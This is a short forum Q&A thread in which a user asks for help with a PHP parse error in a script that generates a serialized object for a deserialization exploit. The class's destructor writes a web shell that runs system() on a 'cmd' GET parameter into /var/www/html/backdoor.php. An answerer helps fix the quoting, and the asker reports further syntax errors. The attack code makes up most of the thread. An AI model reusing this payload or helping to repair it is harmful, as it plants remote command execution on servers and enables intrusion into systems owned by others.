0

I have changed things many times but nothing works. Can someone help me. thanks!

PHP Parse error: syntax error, unexpected '$_GET' (T_VARIABLE), expecting ',' or ';'

<?php
class Monitor
{
  public $filename = "/var/www/html/backdoor.php";
  public $content = "<?php system("$_GET['cmd']"); ?>";
  public function __destruct()
  {
    file_put_contents($this->filename,$this->content);
  }
  public function __toString()
  {
    return "Return the message ".$this->filename." ".$this->content."<br>"; 
  }
}
$exploit = new Monitor();
echo serialize($exploit);
?>
mew_www
  • 1
  • 2

1 Answers1

0

You need to escape your quotes:

public $content = "<?php system(\"$_GET['cmd']\"); ?>";
Marie Lena Brosch
  • 31
  • 1
  • PHP Parse error: syntax error, unexpected '"', expecting identifier (T_STRING) `class Monitor { public $filename = "/var/www/html/backdoor.php"; public $content = ""; public function __destruct() { file_put_contents($this->filename,$this->content); } public function __toString() { return "Return the message ".$this->filename." ".$this->content."
    "; } } $exploit = new Monitor(); echo serialize($exploit); ?>`     – mew_www Jan 08 '22 at 14:58
  • this time you are missing the single quotes around `cmd` – Marie Lena Brosch Jan 08 '22 at 15:07
  • PHP Parse error: syntax error, unexpected '"', expecting identifier (T_STRING) `class Monitor { public $filename = "/var/www/html/backdoor.php"; public $content = ""; public function __destruct() { file_put_contents($this->filename,$this->content); } public function __toString() { return "Return the message ".$this->filename." ".$this->content."
    "; } } $exploit = new Monitor(); echo serialize($exploit); ?>`     – mew_www Jan 08 '22 at 15:28